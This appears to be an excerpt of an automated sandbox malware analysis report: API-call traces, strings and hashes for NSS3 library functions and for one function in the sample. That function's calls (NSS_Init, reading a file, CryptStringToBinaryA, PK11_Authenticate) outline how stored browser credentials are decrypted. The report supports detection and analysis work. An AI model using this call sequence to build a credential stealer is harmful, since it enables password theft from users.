PL_strncpyz.NSS3(?, *phPublicKey = 0x%x,00000050), ref: 6BCA8D92
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BCA8DA1
PR_LogPrint.NSS3(?,00000000), ref: 6BCA8DB7
PL_strncpyz.NSS3(?, *phPrivateKey = 0x%x,00000050), ref: 6BCA8DEB
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BCA8DFA

Part of subcall function 6BC60F00: PR_GetPageSize.NSS3(6BC60936,FFFFE8AE,?,6BBF16B7,00000000,?,6BC60936,00000000,?,6BBF204A), ref: 6BC60F1B
Part of subcall function 6BC60F00: PR_NewLogModule.NSS3(clock,6BC60936,FFFFE8AE,?,6BBF16B7,00000000,?,6BC60936,00000000,?,6BBF204A), ref: 6BC60F25

PR_LogPrint.NSS3(?,00000000), ref: 6BCA8E10

Strings

ulPrivateKeyAttributeCount = %d, xrefs: 6BCA8CA2
C_GenerateKeyPair, xrefs: 6BCA8BC1
*phPrivateKey = 0x%x, xrefs: 6BCA8DD5, 6BCA8DE5
ulPublicKeyAttributeCount = %d, xrefs: 6BCA8C6E
*phPublicKey = 0x%x, xrefs: 6BCA8D7C, 6BCA8D8C
pPublicKeyTemplate = 0x%p, xrefs: 6BCA8C55
hSession = 0x%x, xrefs: 6BCA8BDE, 6BCA8BEE
phPrivateKey = 0x%p, xrefs: 6BCA8CE2
phPublicKey = 0x%p, xrefs: 6BCA8CBD
pPrivateKeyTemplate = 0x%p, xrefs: 6BCA8C87
pMechanism = 0x%p, xrefs: 6BCA8C3A
(CK_INVALID_HANDLE), xrefs: 6BCA8BFC, 6BCA8D9A, 6BCA8DF3

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn$ModulePageSize
String ID: *phPrivateKey = 0x%x$ *phPublicKey = 0x%x$ hSession = 0x%x$ pMechanism = 0x%p$ pPrivateKeyTemplate = 0x%p$ pPublicKeyTemplate = 0x%p$ phPrivateKey = 0x%p$ phPublicKey = 0x%p$ ulPrivateKeyAttributeCount = %d$ ulPublicKeyAttributeCount = %d$ (CK_INVALID_HANDLE)$C_GenerateKeyPair
API String ID: 510426473-985563836
Opcode ID: fc1664677497a163cd5b8fa6962f9bd3a7053330d725366d337a843fde82f609
Instruction ID: e79ac93b7d0c9e854ae67b6eca2919c0cec2965bc4446b071fe8cb9e9f91658a
Opcode Fuzzy Hash: fc1664677497a163cd5b8fa6962f9bd3a7053330d725366d337a843fde82f609
Instruction Fuzzy Hash: 1A61F675911156EFEB00DF60DD85E5ABB61AB8632DF088064E8486F252E73DDA04CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6BC86BF0 Relevance: 49.1, APIs: 19, Strings: 9, Instructions: 148COMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(6BDC0148,?,?,?,?,6BC86DC2), ref: 6BC86BFF
PR_smprintf.NSS3(%s manufacturerID='%s',00000000,?,6BC86DC2), ref: 6BC86C1C

Part of subcall function 6BC5C5E0: free.MOZGLUE(?,?,?,?,00000000,00000001,?,6BC61FBD,Unable to create nspr log file '%s',00000000), ref: 6BC5C63B

free.MOZGLUE(00000000,?,?,?,6BC86DC2), ref: 6BC86C27
PR_smprintf.NSS3(%s libraryDescription='%s',00000000,?,6BC86DC2), ref: 6BC86C45
free.MOZGLUE(00000000,?,?,?,6BC86DC2), ref: 6BC86C50
PR_smprintf.NSS3(%s cryptoTokenDescription='%s',00000000,?,6BC86DC2), ref: 6BC86C71
free.MOZGLUE(00000000,?,?,?,6BC86DC2), ref: 6BC86C7C
PR_smprintf.NSS3(%s dbTokenDescription='%s',00000000,?,6BC86DC2), ref: 6BC86C9D
free.MOZGLUE(00000000,?,?,?,6BC86DC2), ref: 6BC86CA8
PR_smprintf.NSS3(%s cryptoSlotDescription='%s',00000000,?,6BC86DC2), ref: 6BC86CC9
free.MOZGLUE(00000000,?,?,?,6BC86DC2), ref: 6BC86CD4
PR_smprintf.NSS3(%s dbSlotDescription='%s',00000000,?,6BC86DC2), ref: 6BC86CF5
free.MOZGLUE(00000000,?,?,?,6BC86DC2), ref: 6BC86D00
PR_smprintf.NSS3(%s FIPSSlotDescription='%s',00000000,?,6BC86DC2), ref: 6BC86D1D
free.MOZGLUE(00000000,?,?,?,6BC86DC2), ref: 6BC86D28
PR_smprintf.NSS3(%s FIPSTokenDescription='%s',00000000,?,6BC86DC2), ref: 6BC86D45
free.MOZGLUE(00000000,?,?,?,6BC86DC2), ref: 6BC86D50
PR_smprintf.NSS3(%s minPS=%d,00000000,?,6BC86DC2), ref: 6BC86D68
free.MOZGLUE(00000000,?,?,?,6BC86DC2), ref: 6BC86D73

Strings

%s cryptoTokenDescription='%s', xrefs: 6BC86C6C
%s libraryDescription='%s', xrefs: 6BC86C40
%s manufacturerID='%s', xrefs: 6BC86C17
%s dbTokenDescription='%s', xrefs: 6BC86C98
%s minPS=%d, xrefs: 6BC86D63
%s FIPSSlotDescription='%s', xrefs: 6BC86D18
%s cryptoSlotDescription='%s', xrefs: 6BC86CC4
%s FIPSTokenDescription='%s', xrefs: 6BC86D40
%s dbSlotDescription='%s', xrefs: 6BC86CF0

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: R_smprintffree
String ID: %s FIPSSlotDescription='%s'$%s FIPSTokenDescription='%s'$%s cryptoSlotDescription='%s'$%s cryptoTokenDescription='%s'$%s dbSlotDescription='%s'$%s dbTokenDescription='%s'$%s libraryDescription='%s'$%s manufacturerID='%s'$%s minPS=%d
API String ID: 657075589-3414793728
Opcode ID: 2a5f414fe05a3f57345b8305239db31b32aa94a05d8123675974cc849fba4503
Instruction ID: ba21a4899c0db57ae5fcfb716077caaf1ccd1e2b345ad3d7cf38789b262c784c
Opcode Fuzzy Hash: 2a5f414fe05a3f57345b8305239db31b32aa94a05d8123675974cc849fba4503
Instruction Fuzzy Hash: EF4183F752282227A7005B655C0AD673E5DDE815E8B0901B1FC1DCB300FB2ACB2692FA

Uniqueness

Uniqueness Score: -1.00%

Function 6BC60AA0 Relevance: 45.7, APIs: 24, Strings: 2, Instructions: 227libraryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6BC60AD4

Part of subcall function 6BD1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BD1C2BF

PR_EnterMonitor.NSS3 ref: 6BC60B0D
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 6BC60B2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 6BC60B54
WideCharToMultiByte.KERNEL32 ref: 6BC60B94
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6BC60BC9
calloc.MOZGLUE(00000001,00000014), ref: 6BC60BEA
LoadLibraryExW.KERNEL32(?,00000000,?), ref: 6BC60C15

Strings

error %d, xrefs: 6BC60D08
Loaded library %s (load lib), xrefs: 6BC60D6F

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: ByteCharMultiWide$EnterErrorLibraryLoadMonitorValuecalloc
String ID: Loaded library %s (load lib)$error %d
API String ID: 2139286163-2368894446
Opcode ID: 390150401299d449acbd00957c71cf80f9f3907c20ba2c374a42fe89f1754559
Instruction ID: 246f1d748e7bbdcce2c4c44f8130810929fe74a5c00eff1e78f97371ce117756
Opcode Fuzzy Hash: 390150401299d449acbd00957c71cf80f9f3907c20ba2c374a42fe89f1754559
Instruction Fuzzy Hash: 9A71E570D51211ABEB109F75CDC5A5AB7ACEF46794F044169E80AEA241FB38DF40CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6BCACB70 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 225fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(NSS_OUTPUT_FILE,6BCC444C,00000000,00000000,00000000,?,6BC87F7C,6BC880DD), ref: 6BCACB8B

Part of subcall function 6BC61240: TlsGetValue.KERNEL32(00000040,?,6BC6116C,NSPR_LOG_MODULES), ref: 6BC61267
Part of subcall function 6BC61240: EnterCriticalSection.KERNEL32(?,?,?,6BC6116C,NSPR_LOG_MODULES), ref: 6BC6127C
Part of subcall function 6BC61240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6BC6116C,NSPR_LOG_MODULES), ref: 6BC61291
Part of subcall function 6BC61240: PR_Unlock.NSS3(?,?,?,?,6BC6116C,NSPR_LOG_MODULES), ref: 6BC612A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6BDBDEB5,?,6BCC444C,00000000,00000000,00000000,?,6BC87F7C,6BC880DD), ref: 6BCACB9D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,6BCC444C,00000000,00000000,00000000,?,6BC87F7C,6BC880DD), ref: 6BCACBAE
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000,?,?,?,?,?,?,?,?,?,6BCC444C,00000000,00000000,00000000), ref: 6BCACBE6
PR_IntervalToMicroseconds.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6BCC444C,00000000,00000000,00000000), ref: 6BCACC37
PR_IntervalToMilliseconds.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6BCC444C,00000000,00000000), ref: 6BCACCA4
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6BCACD84
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6BCC444C,00000000), ref: 6BCACDA6
PR_IntervalToMilliseconds.NSS3(6BCC444C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6BCC444C), ref: 6BCACE02
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6BCACE59
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 6BCACE64
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6BCACE72

Strings

%-25s %10d %10d%2s , xrefs: 6BCACCD3
NSS_OUTPUT_FILE, xrefs: 6BCACB86
Maximum number of concurrent open sessions: %d, xrefs: 6BCACE4A
Avg., xrefs: 6BCACBBE
% Time, xrefs: 6BCACBB9
%25s %10d %10d%2s, xrefs: 6BCACE33
%-25s %10s %12s %12s %10s, xrefs: 6BCACBD2
Function, xrefs: 6BCACBCD
# Calls, xrefs: 6BCACBC8
Totals, xrefs: 6BCACE2E

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Intervalfputc$Milliseconds__acrt_iob_func$CriticalEnterMicrosecondsSectionSecureUnlockValuefclosefflushfopengetenv
String ID: Maximum number of concurrent open sessions: %d$# Calls$% Time$%-25s %10d %10d%2s $%-25s %10s %12s %12s %10s$%25s %10d %10d%2s$Avg.$Function$NSS_OUTPUT_FILE$Totals
API String ID: 2795105899-3917921256
Opcode ID: 8cbc29ff472acea3c6e7d787eac72ae29239a82d9a22d628b548c695f9ad744a
Instruction ID: 13a86fc6241a9a46b22af6604633e4c68816ff7fc40a750d33119977c30245ab
Opcode Fuzzy Hash: 8cbc29ff472acea3c6e7d787eac72ae29239a82d9a22d628b548c695f9ad744a
Instruction Fuzzy Hash: 5A718D72D102425BDB019B79DC42A1FBB65AFC6794F044226F80A7F301FB3D865587E6

Uniqueness

Uniqueness Score: -1.00%

Function 6BC8AB90 Relevance: 33.4, APIs: 22, Instructions: 388COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6BC8ABCB
EnterCriticalSection.KERNEL32 ref: 6BC8ABE4
TlsGetValue.KERNEL32 ref: 6BC8AC0B
PR_Unlock.NSS3 ref: 6BC8AC7B
TlsGetValue.KERNEL32 ref: 6BC8AC9C
EnterCriticalSection.KERNEL32 ref: 6BC8ACB5
PR_WaitCondVar.NSS3 ref: 6BC8ACD5
TlsGetValue.KERNEL32 ref: 6BC8ACF4

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Value$CriticalEnterSection$CondUnlockWait
String ID:
API String ID: 839227765-0
Opcode ID: 7aa6cbe003b23b2bf5ea99ddda09373daabb4c0a4ae9a81293ed0b4ae821c18f
Instruction ID: 623a08fc82ea4da9b862b2ad9c7ecc7530f9da65cefbd8c29842dfbe4314ddf3
Opcode Fuzzy Hash: 7aa6cbe003b23b2bf5ea99ddda09373daabb4c0a4ae9a81293ed0b4ae821c18f
Instruction Fuzzy Hash: 43F16DB0914711CFEB109F78C585769FBF0BF46308F0089A9E9999B251FB38E694CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BCAAB10 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptMessageNext), ref: 6BCAAB36
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6BCAAB64
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BCAAB73

Part of subcall function 6BD8D930: PL_strncpyz.NSS3(?,?,?), ref: 6BD8D963

PR_LogPrint.NSS3(?,00000000), ref: 6BCAAB89
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6BCAABAB
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6BCAABC6
PR_LogPrint.NSS3( pCiphertextPart = 0x%p,?), ref: 6BCAABE1
PR_LogPrint.NSS3( ulCiphertextPartLen = %d,?), ref: 6BCAABFC
PR_LogPrint.NSS3( pPlaintextPart = 0x%p,?), ref: 6BCAAC17
PR_LogPrint.NSS3( pulPlaintextPartLen = 0x%p,?), ref: 6BCAAC30

Strings

pPlaintextPart = 0x%p, xrefs: 6BCAAC12
ulCiphertextPartLen = %d, xrefs: 6BCAABF7
hSession = 0x%x, xrefs: 6BCAAB4E, 6BCAAB5E
C_DecryptMessageNext, xrefs: 6BCAAB31
pCiphertextPart = 0x%p, xrefs: 6BCAABDC
pParameter = 0x%p, xrefs: 6BCAABA6
ulParameterLen = 0x%p, xrefs: 6BCAABC1
(CK_INVALID_HANDLE), xrefs: 6BCAAB6C
pulPlaintextPartLen = 0x%p, xrefs: 6BCAAC2B

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pCiphertextPart = 0x%p$ pParameter = 0x%p$ pPlaintextPart = 0x%p$ pulPlaintextPartLen = 0x%p$ ulCiphertextPartLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_DecryptMessageNext
API String ID: 1003633598-206538543
Opcode ID: 702c4a035796dead9969a6be825b97c2bdcf5f8c7630ea349adffdda81d1c804
Instruction ID: 399ee4536ee64f675b84f76ac61e3fd46660469240f81e467d0c87a4f950970f
Opcode Fuzzy Hash: 702c4a035796dead9969a6be825b97c2bdcf5f8c7630ea349adffdda81d1c804
Instruction Fuzzy Hash: 7441E535411115BFEB009F64ED45E59BBA2FBC636DF098024F9486F161E73ACA14CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6BCB3B30 Relevance: 33.4, APIs: 22, Instructions: 368COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6BCB3B90
EnterCriticalSection.KERNEL32(0000001D), ref: 6BCB3BA4
TlsGetValue.KERNEL32 ref: 6BCB3DC5
EnterCriticalSection.KERNEL32(0000001D), ref: 6BCB3DD9

Part of subcall function 6BC607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BBF204A), ref: 6BC607AD
Part of subcall function 6BC607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BBF204A), ref: 6BC607CD
Part of subcall function 6BC607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BBF204A), ref: 6BC607D6
Part of subcall function 6BC607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BBF204A), ref: 6BC607E4
Part of subcall function 6BC607A0: TlsSetValue.KERNEL32(00000000,?,6BBF204A), ref: 6BC60864
Part of subcall function 6BC607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BC60880
Part of subcall function 6BC607A0: TlsSetValue.KERNEL32(00000000,?,?,6BBF204A), ref: 6BC608CB
Part of subcall function 6BC607A0: TlsGetValue.KERNEL32(?,?,6BBF204A), ref: 6BC608D7
Part of subcall function 6BC607A0: TlsGetValue.KERNEL32(?,?,6BBF204A), ref: 6BC608FB

PR_Unlock.NSS3(00000001), ref: 6BCB3E13
PR_SetError.NSS3(00000000,00000000), ref: 6BCB3E2B
PR_Unlock.NSS3(?), ref: 6BCB3E99
TlsGetValue.KERNEL32 ref: 6BCB3EBC
EnterCriticalSection.KERNEL32(0000001C), ref: 6BCB3ED4
PR_Unlock.NSS3(?), ref: 6BCB3EFF
PR_SetError.NSS3(00000000,00000000), ref: 6BCB3BEB

Part of subcall function 6BD1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BD1C2BF

PR_Unlock.NSS3(?), ref: 6BCB3D7B
PR_Unlock.NSS3(00000001), ref: 6BCB3BCF

Part of subcall function 6BD1DD70: TlsGetValue.KERNEL32 ref: 6BD1DD8C
Part of subcall function 6BD1DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6BD1DDB4

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6BCB3C23
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BCB3C37
PR_Unlock.NSS3(?), ref: 6BCB3C78
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BCB3C96
EnterCriticalSection.KERNEL32(?), ref: 6BCB3CAA
PR_Unlock.NSS3(?), ref: 6BCB3D13
TlsGetValue.KERNEL32 ref: 6BCB3D37
EnterCriticalSection.KERNEL32(0000001C), ref: 6BCB3D4F
PR_SetError.NSS3(FFFFE028,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6BCB3F1C

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$calloc$Leave
String ID:
API String ID: 186629115-0
Opcode ID: 7a273760f984af943dacc552c2c61b771651ad7c59daa5b01eb0698420646516
Instruction ID: 8415553309849fbeac1012ef136e0dad3cf13a030d1e121baf5d64e76243a5ed
Opcode Fuzzy Hash: 7a273760f984af943dacc552c2c61b771651ad7c59daa5b01eb0698420646516
Instruction Fuzzy Hash: 03E1CF75C10219AFEF119FA4D885BADBBB4FF49318F0441A5EC04AB211E739EA95CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6BCA3B20 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 141COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_CreateObject), ref: 6BCA3B46
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6BCA3B74
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BCA3B83

Part of subcall function 6BD8D930: PL_strncpyz.NSS3(?,?,?), ref: 6BD8D963

PR_LogPrint.NSS3(?,00000000), ref: 6BCA3B99
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6BCA3BBA
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6BCA3BD6
PR_LogPrint.NSS3( phObject = 0x%p,?), ref: 6BCA3BF6
PL_strncpyz.NSS3(?, *phObject = 0x%x,00000050), ref: 6BCA3C8E
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BCA3C9D
PR_LogPrint.NSS3(?,00000000), ref: 6BCA3CB3

Strings

*phObject = 0x%x, xrefs: 6BCA3C78, 6BCA3C88
ulCount = %d, xrefs: 6BCA3BD1
pTemplate = 0x%p, xrefs: 6BCA3BB3
hSession = 0x%x, xrefs: 6BCA3B5E, 6BCA3B6E
phObject = 0x%p, xrefs: 6BCA3BF1
C_CreateObject, xrefs: 6BCA3B41
(CK_INVALID_HANDLE), xrefs: 6BCA3B7C, 6BCA3C96

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *phObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ phObject = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_CreateObject
API String ID: 1003633598-1262032263
Opcode ID: 96be2b2a2f0b9c887eb7c5cc7baa58e376381cfdab8601f496d2f0b0fa822336
Instruction ID: a8afa5be5a6729068825511c3e43417236541303443eab1cc7bb5bac13aa8e89
Opcode Fuzzy Hash: 96be2b2a2f0b9c887eb7c5cc7baa58e376381cfdab8601f496d2f0b0fa822336
Instruction Fuzzy Hash: D841E430A11115AFEB10DF24ED95E5AB765EBC636DF084025E849AF251EB38DE04CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 0040C100 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 383filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 0040C112

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,02F550F8,00000000,?,0041DBAC,00000000,?,?), ref: 0040C1D6
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040C1F3
GetFileSize.KERNEL32(00000000,00000000), ref: 0040C1FF
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040C212

Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8

ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040C242
StrStrA.SHLWAPI(?,02F54E40,0041D72E), ref: 0040C260
StrStrA.SHLWAPI(00000000,02F54E58), ref: 0040C287
StrStrA.SHLWAPI(?,02F55868,00000000,?,0041DBB8,00000000,?,00000000,00000000,?,02F51A68,00000000,?,0041DBB4,00000000,?), ref: 0040C405
StrStrA.SHLWAPI(00000000,02F55888), ref: 0040C41C

Part of subcall function 0040BF90: memset.MSVCRT ref: 0040BFC3
Part of subcall function 0040BF90: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02F519F8), ref: 0040BFE1
Part of subcall function 0040BF90: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040BFEC
Part of subcall function 0040BF90: PK11_GetInternalKeySlot.NSS3 ref: 0040BFFA
Part of subcall function 0040BF90: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C015
